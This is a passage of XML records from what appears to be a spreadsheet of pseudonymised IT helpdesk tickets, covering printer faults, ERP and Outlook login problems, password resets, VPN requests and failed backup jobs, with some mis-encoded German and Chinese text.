    <s v="hello  please urgently fix!  mwstã€€errorã€‚ã€‚ã€‚  mm7218674  best regards."/>
    <s v="hello_x000d__x000a__x000d__x000a_please urgently fix!_x000d__x000a__x000d__x000a_mwstã€€errorã€‚ã€‚ã€‚_x000d__x000a__x000d__x000a_mm7218674_x000d__x000a__x000d__x000a_best "/>
    <s v="uxndyfrs vahxnfgl"/>
    <x v="12"/>
  </r>
  <r>
    <s v="probleme mit drucken \vermessungsmaschine fÃ¼r stÃ¤be \eaodcgsw trmzwbyc"/>
    <s v="probleme mit drucken \vermessungsmaschine fÃ¼r stÃ¤be \eaodcgsw trmzwbyc"/>
    <s v="eaodcgsw trmzwbyc"/>
    <x v="24"/>
  </r>
  <r>
    <s v="support fÃ¼r alicona \jionmpsf wnkpzcmv"/>
    <s v="support fÃ¼r alicona \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="error when qualifying lead by user prarthyr jhr"/>
    <s v="refer email sent"/>
    <s v="cfzsajbe lyejkdho"/>
    <x v="39"/>
  </r>
  <r>
    <s v="restart the company service in HostName_1041"/>
    <s v="restart the company service in HostName_1041"/>
    <s v="cubdsrml znewqgop"/>
    <x v="7"/>
  </r>
  <r>
    <s v="fw: you must validate your account"/>
    <s v="dear it help,_x000d__x000a__x000d__x000a_i got below email, what should i do? is it corporate instruction or external party which no need to follow. _x000d__x000a__x000d__x000a_please advice._x000d__x000a__x000d__x000a_best "/>
    <s v="uvjpaeli bnphqsxr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call for ecwtrjnq jpecxuty"/>
    <s v="call for ecwtrjnq jpecxuty"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="german call"/>
    <s v="german call"/>
    <s v="ayrhcfxi zartupsw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need addiitional software and email settings checked."/>
    <s v="from: wykigmnz wvdgopybrumugam _x000a_sent: 06 september 2016 17:21_x000a_to: mgyhnsat aswubnyd_x000a_cc: sridthshar herytur; mvfnbces urbckxna1; dargthya jayartheuy; amihtar lalthy; tcqpyuei becoxvqkahadikar; jayatramdntydba cvyg_x000a_subject: re: old laptop e-6410 or e- 6420_x000a__x000a_dear mr.,_x000a__x000a_i am started using the new laptop &amp; the following issue facing._x000a__x000a_s no requirement / problem remarkhtys_x000a_1 csm module not working properly _x000a_2 wrench_engineering_toolent software not available _x000a_3 fanuc ladder  software not available _x000a_4 in mail, some option not working properly _x000a_5 dwg true viewer software required _x000a__x000a_please do the needful._x000a__x000a_best "/>
    <s v="wykigmnz wvdgopyb"/>
    <x v="18"/>
  </r>
  <r>
    <s v="log on balancing error."/>
    <s v="log on balancing error."/>
    <s v="umkpayhc adflvbxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update inplant_862430"/>
    <s v="ticket update inplant_862430"/>
    <s v="ayrhcfxi zartupsw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering tool not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ftsqkvre.bqzrupic@gmail.com_x000d__x000a__x000d__x000a_dear sir_x000d__x000a__x000d__x000a_ivohcdpw ixcanwbm is not able to access his engineering tool. he has requested for help also from it but till date nothing has moved ahead. please help nthryitin to get access to engineering tool and install the same at earliest._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="ftsqkvre bqzrupic"/>
    <x v="0"/>
  </r>
  <r>
    <s v="german call"/>
    <s v="german call"/>
    <s v="ayrhcfxi zartupsw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="drucker em26 druckt mit bis zu 2 std. verzÃ¶gerung (printer can not be pinged. see attachment)"/>
    <s v="drucker em26 druckt mit bis zu 2 std. verzÃ¶gerung _x000d__x000a_wird von pc eemw8144218 aus gedruckt ce ap messecke_x000d__x000a__x000d__x000a_â€¢  printer name / make - model?  (ex hq50 â€“ wy98 - hp 8150) : em26_x000d__x000a_â€¢  detailed description of the problem ? : printer takes too long time to print. error :' 49.ff04 error. turn off then on' . the printer is restarted a couple of times. does not help. printer can not be pinged. (see attachment) it looks like it's a non existing printer._x000d__x000a__x000d__x000a_â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) : data from access datenbank, excel_x000d__x000a_      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000d__x000a_â€¢  what system or application being used at time of the problem?      (ex windows / erp /kls) : windows"/>
    <s v="djilqgmw bidchqsg"/>
    <x v="41"/>
  </r>
  <r>
    <s v="info type '0017' is missing to personal numbers 5264454, 5634451 &amp; 5659454"/>
    <s v="from: lmwohkbd ucziatex _x000a_sent: friday, september 30, 2016 11:42 am_x000a_to: nyifqpmv kfirxjag_x000a_subject: aw: travel expense manager_x000a__x000a_hello_x000a__x000a_transaktion â€žpr05&quot; also doesn't work for personal no's 56595674 and 5634561._x000a__x000a_mit freundlichen grÃ¼ÃŸen _x000a__x000a_lmwohkbd ucziatex_x000a_programdnty engineering europe_x000a_lmwohkbd.ucziatex@gmail.com_x000a__x000a_geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq_x000a__x000a__x000a_von: lmwohkbd ucziatex _x000a_gesendet: freitag, 30. september 2016 08:03_x000a_an: nyifqpmv kfirxjag &lt;nmtszgbr.wnthvqgm@gmail.com&gt;_x000a_betreff: travel expense manager_x000a__x000a_hello _x000a__x000a_â€žtravel expense manager&quot; doesn't work!_x000a__x000a__x000a_ _x000a__x000a_mit freundlichen grÃ¼ÃŸen _x000a__x000a_lmwohkbd ucziatex_x000a_programdnty engineering europe_x000a_lmwohkbd.ucziatex@gmail.com_x000a__x000a_"/>
    <s v="lmwohkbd ucziatex"/>
    <x v="9"/>
  </r>
  <r>
    <s v="vpn access for elcpduzg eujpstxi (graurkart)"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fbyusmxz.kxvmcbly@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_please set up vpn access for elcpduzg eujpstxi (graurkart)._x000d__x000a_rudolf has a kennmetal owned laptop eeml703222_x000d__x000a_"/>
    <s v="fbyusmxz kxvmcbly"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook was not accepting password"/>
    <s v="user change the password through vpn._x000d__x000a_user was getting a password prompt."/>
    <s v="nmtszgbr wnthvqgm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="script jb_ecc_bw_zsd531 to pull august 2016 month data and revert back to delta extraction."/>
    <s v="we are in the process of refreshing history in rr. we need to modify bobj script jb_ecc_bw_zsd531 to pull august 2016 month new pricing sales data from zsd532 by giving date range. we need to move the changes to production and extract the data today itself. once the data is extracted, we will revert back the programdnty jb_ecc_bw_zsd531 to extract delta data."/>
    <s v="ualdxfir kizjmqte"/>
    <x v="20"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 09/30/2016 04:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 09/30/2016 04:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="probleme mit skype und outlook \ user :dardabthyr"/>
    <s v="probleme mit skype und outlook \ user :dardabthyr"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit skype und outlook \dardabthyr"/>
    <s v="probleme mit skype und outlook \dardabthyr"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="0"/>
  </r>
  <r>
    <s v="kannst du bitte noch mal 2 usb-sticks   16 gb besorgen  bei uns ist wieder einer kaputt gegangen"/>
    <s v="kannst du bitte noch mal 2 usb-sticks   16 gb besorgen  bei uns ist wieder einer kaputt gegangen"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="unser kopierer we 95 (hp laserjet) zeigt fehlermeldung â€žtransfereinheit fehlt&quot; an."/>
    <s v="unser kopierer we 95 (hp laserjet) zeigt fehlermeldung â€žtransfereinheit fehlt&quot; an."/>
    <s v="fdyietau dvsyxwbu"/>
    <x v="24"/>
  </r>
  <r>
    <s v="erp access issue :  refrence to oss 337622 / 2016 "/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_1_x000a__x000a_enter user id of user having the issue: vv337622_x000a__x000a_transaction code(s) the user needs or was working with: va01 &amp; please copy the roles of user id kawtidthry._x000a__x000a_describe the issue: please provide remote login credentials and update in oss secure connection area._x000a__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000a__x000a_provide access the same as this other user:"/>
    <s v="arhjlgdz pxtsjnlk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="ir posting error_urgently"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tkjypfze.jxompytk@gmail.com_x000d__x000a__x000d__x000a_hi team,_x000d__x000a__x000d__x000a_kindly create a ticket and assign it to me_x000d__x000a__x000d__x000a_"/>
    <s v="ihfkwzjd erbxoyqk"/>
    <x v="9"/>
  </r>
  <r>
    <s v="enterprise scanner is freezing. "/>
    <s v="enterprise scanner is freezing. _x000a_telephone:"/>
    <s v="vrmdtcal agythfow"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bk_biaprod failed in job_scheduler at: 09/30/2016 03:47:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_[major] from: bma@HostName_1304.hq.company.com &quot;lib6_drive4&quot;  time: 9/30/2016 3:45:46 am_x000d__x000a_[90:51]   /dev/rmt35.1_x000d__x000a_ cannot write to device ([5] i/o error)_x000d__x000a__x000d__x000a_job bk_biaprod failed in job_scheduler at: 09/30/2016 03:47:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ir posting error_urgently"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ihfkwzjd.erbxoyqk@gmail.com_x000d__x000a__x000d__x000a_dear it team_x000d__x000a__x000d__x000a_kindly fixed it transaction error as below within 30/9/19 to avoid difference for intercompany reconciliation._x000d__x000a__x000d__x000a__x000d__x000a_1.     ir transaction has not been posted._x000d__x000a_[cid:image003.jpg@01SID_35b29.6f9d3af0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_2.     duplicate ir transaction._x000d__x000a_[cid:image006.jpg@01SID_35b29.6f9d3af0]_x000d__x000a__x000d__x000a_best "/>
    <s v="ihfkwzjd erbxoyqk"/>
    <x v="9"/>
  </r>
  <r>
    <s v="vpnå®‰è£…-è½¬è´ºæ­£å¹³"/>
    <s v="_x000a__x000a_received from: tuqrvowp.fxmzkvqo@gmail.com_x000a__x000a_è¯·å¸®å¿™å®‰è£…vpnè½¯ä»¶ï¼Œ è½¬è´ºæ­£å¹³_x000a__x000a__x000a_tuqrvowp fxmzkvqo é’±å”é‘«_x000a_human resources_x000a_tuqrvowp.fxmzkvqo@gmail.com&lt;mailto:tuqrvowp.fxmzkvqo@gmail.com&gt;_x000a__x000a__x000a_ä¸Šæµ·å‡é˜³è¶…å¾®ç²‰æœ‰é™å…¬å¸_x000a_ä¸Šæµ·å¸‚å¥‰è´¤åŒºé™ˆæ¡¥è·¯1508å·_x000a_é‚®ç¼–ï¼š201400_x000a__x000a_"/>
    <s v="tuqrvowp fxmzkvqo"/>
    <x v="30"/>
  </r>
  <r>
    <s v="job Job_2645 failed in job_scheduler at: 09/30/2016 03:35:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2645 failed in job_scheduler at: 09/30/2016 03:35:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="please approve primary email of jeknosml gkcoltsy in ms crm"/>
    <s v="hello_x000d__x000a_please approve primary email of jeknosml gkcoltsy in ms crm prod and train. email: jeknosml.gkcoltsy@gmail.com_x000d__x000a__x000d__x000a_"/>
    <s v="ugephfta hrbqkvij"/>
    <x v="15"/>
  </r>
  <r>
    <s v="&quot;po not created&quot;"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vhlepcta.lqbgcxpt@gmail.com_x000d__x000a__x000d__x000a_hello team,_x000d__x000a_could you please check the error and help us? we cannot create the inwarehouse_tool for this delivery for 3 months because of this error and it cannot be solved._x000d__x000a__x000d__x000a_your urgent support is needed._x000d__x000a_"/>
    <s v="vhlepcta lqbgcxpt"/>
    <x v="12"/>
  </r>
  <r>
    <s v="erp is very slow, please resolve the issue on urgent basis."/>
    <s v="_x000d__x000a__x000d__x000a_received from: ohdrnswl.rezuibdt@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_erp is very slow, please resolve the issue on urgent basis._x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="ohdrnswl rezuibdt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i have lost my access to reporting_tool in crm as per notes below "/>
    <s v="from: dthyan matheywtyuews _x000a_sent: thursday, september 29, 2016 6:26 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: sabrthy fw: synchronization log: _x000a_importance: high_x000a__x000a_i have lost my access to reporting_tool in crm as per notes below _x000a_ _x000a_dthyan matheywtyuews_x000a_sales manager gl2_x000a_oetlgbfw.bsctrnwp@gmail.com_x000a__x000a_ _x000a_ _x000a_______________________________________________x000a_from: dthyan matheywtyuews _x000a_sent: thursday, september 29, 2016 8:23 am_x000a_to: dthyan matheywtyuews &lt;oetlgbfw.bsctrnwp@gmail.com&gt;_x000a_subject: synchronization log: _x000a_importance: high_x000a_ _x000a_ _x000a_8:22:28 synchronizer version 16.0.6741_x000a_8:22:28 synchronizing mailbox 'dthyan matheywtyuews'_x000a_8:22:28 synchronizing hierarchy_x000a_8:22:29 synchronizing local changes in folder 'calendar'_x000a_8:22:29 uploading to server '_x000a_8:22:30     1 view(s)/form(s) updated in online folder_x000a_8:22:30 synchronizing local changes in folder 'inbox'_x000a_8:22:30 uploading to server '_x000a_8:22:31     1 view(s)/form(s) updated in online folder_x000a_8:22:31 downloading from server '_x000a_8:22:31     1 item(s) changed read-state in offline folder_x000a_8:22:31 synchronizing local changes in folder 'contacts'_x000a_8:22:31 uploading to server '_x000a_8:22:32     1 view(s)/form(s) updated in online folder_x000a_8:22:32 synchronizing local changes in folder 'tasks'_x000a_8:22:32 uploading to server '_x000a_8:22:33     1 view(s)/form(s) updated in online folder_x000a_8:22:35 synchronizing server changes in folder 'russ hall - calendar'_x000a_8:22:35 downloading from server '_x000a_8:22:35 error synchronizing folder_x000a_8:22:35           [91181116-508-91181116-560]_x000a_8:22:35           you do not have sufficient permission to perform this operation on this object.  see the folder contact or your system administrator._x000a_8:22:35           microsoft exchange information store_x000a_8:22:35           for more information on this failure, click the url below:_x000a_8:22:35           _x000a_8:22:35 done_x000a_8:22:59 microsoft exchange offline address book_x000a_8:22:59 download successful_x000a_ _x000a_"/>
    <s v="oetlgbfw bsctrnwp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not starting "/>
    <s v="outlook not starting "/>
    <s v="uncpaqvf dxefiybg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="frequent account lock out."/>
    <s v="user : wothyehre is locked out every day."/>
    <s v="dgwrmsja jzlpwuit"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to distributor_tool"/>
    <s v="benoittry is unable to login to distributor_tool. waiting to see if one of the previous passwords (passwords used in erp)  was used while resetting in password_management_tool."/>
    <s v="hadbkvwt touedfyr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need help in changing password in password_management_tool password manager"/>
    <s v="need help in changing password in password_management_tool password manager"/>
    <s v="zngpmjue qvyzposw"/>
    <x v="33"/>
  </r>
  <r>
    <s v="need developer display access for user uacyltoe hxgayczecp1 in SID_29 system "/>
    <s v="need developer display access for user uacyltoe hxgayczecp1 in SID_29 system"/>
    <s v="pxsghrjd wiehqmka"/>
    <x v="19"/>
  </r>
  <r>
    <s v="outlook issues"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jmvnxtgc.kvhxntqp@gmail.com_x000d__x000a__x000d__x000a_encountring outlook issues._x000d__x000a_cannot open from pc_x000d__x000a_urgent._x000d__x000a__x000d__x000a_"/>
    <s v="jmvnxtgc kvhxntqp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issue in engineering tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: eakhgxbw.pfyadjmb@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a__x000d__x000a_i was trying to upload engineering_tool in system. after loading all the details for price, drill details engineering_tool is saved. below is the screen shot which show all details filled._x000d__x000a__x000d__x000a_but i am trying to upload this engineering_tool on server faced an error ,for which screen shot is attached. pl look into this pl resolve this immediately._x000d__x000a__x000d__x000a_all details filled for pricing in uacyltoe hxgaycze sites._x000d__x000a__x000d__x000a_[cid:image009.jpg@01SID_35b03.7527cc40]_x000d__x000a__x000d__x000a_screen shot for error._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image013.jpg@01SID_35b03.7527cc40]_x000d__x000a_"/>
    <s v="eakhgxbw pfyadjmb"/>
    <x v="25"/>
  </r>
  <r>
    <s v="reset passwords for fkuqjwit jgcsaqzi using password_management_tool password reset."/>
    <s v="the"/>
    <s v="fkuqjwit jgcsaqzi"/>
    <x v="16"/>
  </r>
  <r>
    <s v="job bkbackup_tool_reporting_tool_prod_inc failed in job_scheduler at: 09/30/2016 00:08:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_9/30/2016 12:02:31 am :: error: channelerror: connectionreset _x000d__x000a__x000d__x000a_job bkbackup_tool_reporting_tool_prod_inc failed in job_scheduler at: 09/30/2016 00:08:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job bkbackup_tool_HostName_771_prod_full failed in job_scheduler at: 09/29/2016 23:56:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_HostName_771_prod_full failed in job_scheduler at: 09/29/2016 23:56:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp slow"/>
    <s v="erp system is very slow in apac dc. i asked stefytyn shi to uacyltoe hxgaycze the network. he uacyltoe hxgaycze the network, it about 50% packet loss when ping erp server (81.93.78.714), and he check the data from truview, there only 20% link utilization. and he asked apac plant, erp is slow too. so please check the server and solve the issue."/>
    <s v="pkdavqwt tafrmxsh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp can't log on"/>
    <s v="erp disconnected and we can't log on now.  _x000d__x000a_before the disconnection, it took several mins to conduct any action in erp."/>
    <s v="zupifghd vdqxepun"/>
    <x v="13"/>
  </r>
  <r>
    <s v="always get reminder for approval of requisition 01447255, even i approved a lot of times"/>
    <s v="i'm kate liu from apac plant, i can't complete some pr approval, need support_x000d__x000a_my email: mhikeucr.quaixnbe@gmail.com"/>
    <s v="mhikeucr quaixnbe"/>
    <x v="29"/>
  </r>
  <r>
    <s v="top urgent! //price issue"/>
    <s v="_x000a__x000a_received from: wktesmbp.lorjymef@gmail.com_x000a__x000a_dear teamï¼Œ_x000a_pls help to maintain the net price of mm#7108755~_x000a_we need to create sto for this material from plant_283 to plant_105 &amp; its net price just shows as &quot;0.01&quot;~pls. help to maintain it a.s.a.p. cause it's a urgent case~_x000a_thx in advance!_x000a_[cid:image001.png@01SID_35b09.55c64b00]_x000a__x000a_b.rgds_x000a_judthtihty.zhuyhts_x000a_company hardpoint apac-wgq dc_x000a__x000a_"/>
    <s v="wktesmbp lorjymef"/>
    <x v="29"/>
  </r>
  <r>
    <s v="outlook cannot login for notebook"/>
    <s v="_x000d__x000a__x000d__x000a_received from: oydlehun.svnfrxdk@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_please help. i cannot login outlook on my notebook._x000d__x000a__x000d__x000a_"/>
    <s v="oydlehun svnfrxdk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="docking station not working"/>
    <s v="docking station not working. no power for laptop"/>
    <s v="lqvdoijm yntmlehu"/>
    <x v="18"/>
  </r>
  <r>
    <s v="cann't  do &quot;mb31&quot; for po115890552"/>
    <s v="there is a po 226901663  in plant_282._x000d__x000a_now,we need ship it out,but we can't do &quot;mb31&quot; .please help ."/>
    <s v="jerydwbn gdylnaue"/>
    <x v="44"/>
  </r>
  <r>
    <s v="india plant - india (): node company-ap-ind-kkc-2960s-access-sw01.company.com &amp; sw02 is down"/>
    <s v="india plant - india (): node company-ap-ind-kkc-2960s-access-sw01.company.com   is down_x000a_node company-ap-ind-kkc-2960s-access-sw01.company.com located at india kirty is down._x000a_interface down - on   gigabitethernet3/1 &amp;   gigabitethernet3/6Â· connection to company-ap-ind-kkc-2960s-access-sw01 - on   company-ap-ind-admin-4503-core-sw01.company.com "/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="7"/>
  </r>
  <r>
    <s v="urgent- mm6173026"/>
    <s v="dear all_x000a__x000a_would you please solve the issue ?_x000a_to settle negative stock, i need to do gr with migo manually._x000a_like below, erp said g/l account 23646112 does not exist in company code 534522._x000a__x000a_please let me know how to handle it ?_x000a_today is the end of month so please solve it aerp._x000a_ _x000a__x000a_"/>
    <s v="gkwcxzum answkqpe"/>
    <x v="9"/>
  </r>
  <r>
    <s v="customers and sales are not able to create quotes"/>
    <s v="received over 23 emails and numerous calls from customers and sales they are not able to create quotes.  these are the last few days of the quarter and this is a huge risk to lose sales and negatively impact customers."/>
    <s v="vbmzgsdk jdmyazti"/>
    <x v="21"/>
  </r>
  <r>
    <s v="i am not able to service customers - distributor_tool / companycenter login not working"/>
    <s v="unauthorised access. your account has been deleted. please contact help desk._x000d__x000a__x000d__x000a_windows, SID_34, SID_37, SID_39, password_management_tool, bw, hana,  reporting_tool, crm, dynamics, outlook etc.... all are fine. "/>
    <s v="vbmzgsdk jdmyazti"/>
    <x v="21"/>
  </r>
  <r>
    <s v="ms office general question"/>
    <s v="ms office general question"/>
    <s v="gcaktshf kpgfrotd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_555 failed in job_scheduler at: 09/29/2016 18:23:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_555 failed in job_scheduler at: 09/29/2016 18:23:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="can you please help tami receive in the rma below.  details of the issue are below this screen shot.  i'm not sure how t"/>
    <s v="can you please help tami receive in the rma below.  details of the issue are below this screen shot.  i'm not sure how to help."/>
    <s v="nuhfwplj ojcwxser"/>
    <x v="12"/>
  </r>
  <r>
    <s v="request to remove 1 day pick route logic from supply_chain for customer 81174536 in plant_101 view."/>
    <s v="request to remove 1 day pick route logic from supply_chain for customer 81174536 in plant_101 view."/>
    <s v="xnqzhtwu hivumtfz"/>
    <x v="5"/>
  </r>
  <r>
    <s v="crm help needed "/>
    <s v="_x000a__x000a_received from: oetlgbfw.bsctrnwp@gmail.com_x000a__x000a_i am not getting my reporting_engineering_tools and it says i don't have access to veiw manager reports_x000a_please fix aerp_x000a__x000a_dthyan matheywtyuews_x000a_sales manager gl2_x000a_oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;_x000a_"/>
    <s v="oetlgbfw bsctrnwp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype goes to not responding mode"/>
    <s v="skype goes to not responding mode _x000a__x000a_phone:"/>
    <s v="gcaktshf kpgfrotd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ms crm login issue."/>
    <s v="ms crm login issue._x000a_-connected to the user system using teamviewer._x000a_-user is on the company network._x000a_-when user tries to login to the ms crm its gives him a error._x000a_"/>
    <s v="qifzkoej etbmgjvo"/>
    <x v="39"/>
  </r>
  <r>
    <s v="ticket update on sev 2 ticket inplant_864860"/>
    <s v="ticket update on sev 2 ticket inplant_864860"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa - company-na-usa-usa-shop-3750g-access-sw02 hard down due to storm last night "/>
    <s v="we had some bad storms come through last night and took out a switch on the machine network."/>
    <s v="lixjduso upanbtxg"/>
    <x v="3"/>
  </r>
  <r>
    <s v="external link not working in ie "/>
    <s v="external link not working in ie "/>
    <s v="bdgaxriq iltbozkw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to install mobile app on iphone "/>
    <s v="unable to install mobile app on iphone _x000a__x000a_phone: "/>
    <s v="fsvnjexu yxaevupi"/>
    <x v="39"/>
  </r>
  <r>
    <s v="engg work bench login issue."/>
    <s v="engg work bench login issue."/>
    <s v="vyjmlain hvjbmdgi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please remove quote from workflow"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lwgytuxq.qspdztiw@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_please clear quote 3116211904 from my workflow.  this quote no longer exists and should not be showing up in my workflow.  see attached screen shot._x000d__x000a__x000d__x000a_"/>
    <s v="lwgytuxq qspdztiw"/>
    <x v="12"/>
  </r>
  <r>
    <s v="windows account lock out issue "/>
    <s v="windows account lock out issue "/>
    <s v="htsnaodb adjtmlzn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issues with hana"/>
    <s v="_x000a__x000a_received from: zdcheloy.aevzsogn@gmail.com_x000a__x000a_we are all having issues with hana on our systems.  i am on vacation for 2 weeks, but please work with brandeerthy as the lead for getting this fixed._x000a__x000a_we have a defined report that utilized hana to bring in information.  it has been working fine but not we seem to have issues:_x000a__x000a__x000a_1.       when we select analysis the refresh all code is grayed out when we used to be able to just go in and hit refresh all and be done._x000a__x000a_2.       i tried inserting the data source for quote performance from where this is built from, but when i do this i get:_x000a__x000a_a.       when i refresh all, not data changes_x000a__x000a_b.      when i looked at the display, none of the columns and background filters are appearing any longer._x000a__x000a__x000a_brandeerthy please utilize the canada file in the quote performance canada folder dated 2016 09 29 rev 1 as the uacyltoe hxgaycze one when it calls you._x000a__x000a_"/>
    <s v="zdcheloy aevzsogn"/>
    <x v="8"/>
  </r>
  <r>
    <s v="distributor_tool issues for sales area 1108"/>
    <s v="please be aware that sales reps and customer are not able ot request a quote through distributor_tool for sales area 1108."/>
    <s v="qxhdcnmj caflvjrn"/>
    <x v="21"/>
  </r>
  <r>
    <s v="printer issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: iqcylpok.ascpqvni@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_printer ts02 in the purchasing dept. is not sending scans to our emails.  can someone look into this please?_x000d__x000a__x000d__x000a_"/>
    <s v="iqcylpok ascpqvni"/>
    <x v="2"/>
  </r>
  <r>
    <s v="add ed sheehy to purchasing ad"/>
    <s v="xszoedmc gmhkdsnw  please add oabdfcnk xeuhkoqa (shyheehew2) to purchasingupstreamsso and active directory.  the samaccountname in ad is to be all lowercase.  "/>
    <s v="xszoedmc gmhkdsnw"/>
    <x v="19"/>
  </r>
  <r>
    <s v="swap clients e7350 with e7250"/>
    <s v="swap clients e7350 with e7250"/>
    <s v="lqdpfamz mqitfrcv"/>
    <x v="2"/>
  </r>
  <r>
    <s v="cannot get into the lean tracker to save lean events. "/>
    <s v="lean tracker will give me an error when trying to save a lean event.  i get an infopath error.  "/>
    <s v="xdabnget wryuikgd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to usa remote access to carolutyu magyarics to repair prepull system used by the usa factory. "/>
    <s v="need to usa remote access to carolutyu magyarics to repair prepull system which is part of the usanet used by the usa factory. carolutyu is an it consultant used in the past to create custom databases and applications to support the business on the production floor.  her windows id was vvmagyc.   she will require vpn access also along with her administrative rights to repair the sql database.  this system has been down for 36 hours and internal it resources at usa and usa have not been able to resolve."/>
    <s v="bnzysqhm ghsinpmu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="for p.o 5019287566 error message"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kaguhxwo.uoyipxqg@gmail.com_x000d__x000a__x000d__x000a_hi it,_x000d__x000a_please help on this. create dn for po 5019287566. "/>
    <s v="kaguhxwo uoyipxqg"/>
    <x v="5"/>
  </r>
  <r>
    <s v="crm installation"/>
    <s v="crm installation"/>
    <s v="wanyrjkg tsycmeof"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="utfaxivy vwgktxcj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="power outage query"/>
    <s v="power outage query"/>
    <s v="pvlxjizg xzvlwqjc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for hzmxwdrs tcbjyqps using password_management_tool password reset."/>
    <s v="the"/>
    <s v="hzmxwdrs tcbjyqps"/>
    <x v="16"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call"/>
    <s v="pwkrlqbc zslqfmka"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset request "/>
    <s v="windows password reset request "/>
    <s v="nkryuvct jqvcxdrt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to check the payslips"/>
    <s v="need to check the payslips"/>
    <s v="nxvbtfui hjickwyd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="configure crm on the outlook "/>
    <s v="configure crm on the outlook _x000d__x000a__x000d__x000a_949 245 8817"/>
    <s v="fsvnjexu yxaevupi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_39 account locked // password reset"/>
    <s v="erp SID_39 account locked // password reset"/>
